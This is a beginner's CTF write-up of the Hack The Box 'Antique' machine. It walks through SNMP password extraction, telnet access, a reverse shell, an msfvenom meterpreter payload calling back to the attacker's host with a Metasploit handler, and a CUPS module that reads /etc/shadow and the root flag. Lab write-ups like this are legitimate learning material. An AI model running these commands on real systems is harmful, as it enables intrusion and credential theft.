This is my write-up for the machine Antique located at:

I am a beginner at penetration testing, so I will be referencing the Official Hack The Box Walk-through for this machine.

From the tags, I am able to notice that this machine is about printer exploitation on Linux:

A basic nmap scan shows that only telnet is online:

Trying to telnet into the system, it asks for a password:

I also had a deeper nmap scan running: nmap -A -T4 -p- -oN antique.nmap

// SomeStarting Nmap 7.92 ( ) at 2021-12-21 16:13 EST
Warning: giving up on port because retransmission cap hit (6).
Nmap scan report for
Host is up (0.036s latency).
Not shown: 65532 closed tcp ports (conn-refused)
23/tcp    open     telnet?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270: 
|     JetDirect
|     Password:
|   NULL: 
|_    JetDirect
530/tcp   filtered courier
37918/tcp filtered unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 626.36 seconds

This nmap scan came back with pretty much the same information. I then viewed the walk-through to see where I had messed up. I learned about a tool called snmpwalk. In the walk-through, the author runs snmpwalk -v 2c -c public, which gets the following output:

I had actually had found the password for telnet on my own, but I was unable to decode it:

I use snmpget, while the walk-through used snmpwalk. In the walk-through they used binascii (python import) in order to decode the bytes. I wanted to find a solution that was a bit more basic. I ended up using to convert the bytes from hex to ascii:

The password seems to be: P@ssw0rd@123!!123 I was in!

I then noticed the walk-through mentioned to run exec id. I then tried playing around with linux commands, and ended up finding the user.txt file:

I noticed the write-up use python for the reverse shell. I then used to see if I can use one of their python commands. Once I changed their python command from python to python3, it worked:

I viewed the walk-through again to see what I missed. The walk-through author runs the netstat command to see what connections are there:

They then go on to say that we should use chisel to connect to the port. I ran into an issue here where I was unable to download a GitHub repository onto the machine itself. I then realize that you make the binary locally and then upload it to the server. I uploaded the file to the machine by running python3 -m http.server on the folder where chisel was downloaded. I was then able to upload it by running wget on the remote machine. When I uploaded the file, I was unable to run it due to some dependency error in terms of version of libc:

I then followed this write-up to see what I missed and what I could have done instead. They run wget localhost:631, which makes a file called index.html in the folder you are in. There, you can see that CUPS is mentioned:

When we search for cups on metasploit we get the following:

We first make a shell file to upload to the server. To do this, the walk-through mentioned previously mentions msfvenom -p linux/x64/meterpreter/reversetcp LHOST=<YOUR-IP> LPORT=1337 --format elf > shell. This will make the shell file in your directory. To move it to the remote machine, you can use the python http.server command mentioned previously. Before I ran the shell executable, I ran the following commands in Metasploit (based off of this write-up):

use exploit/multi/handler
set lhost <YOUR_IP>
set lport 1337
set payload linux/x64/meterpreter/reverse_tcp 

After I ran the run command, I then switched to the remote machine and ran the shell executable (run chmod +x shell to make it executable). This gave me a connection in Metasploit:

I then ran the following commands to look for the cups post exploitation program:

I then hit run and got an output:

Opening that file shows the output of /etc/shadow:

Since we want to get the output of /root/root.txt, I changed my option in metasploit to that:

Reading that file got me the root flag:

Last updated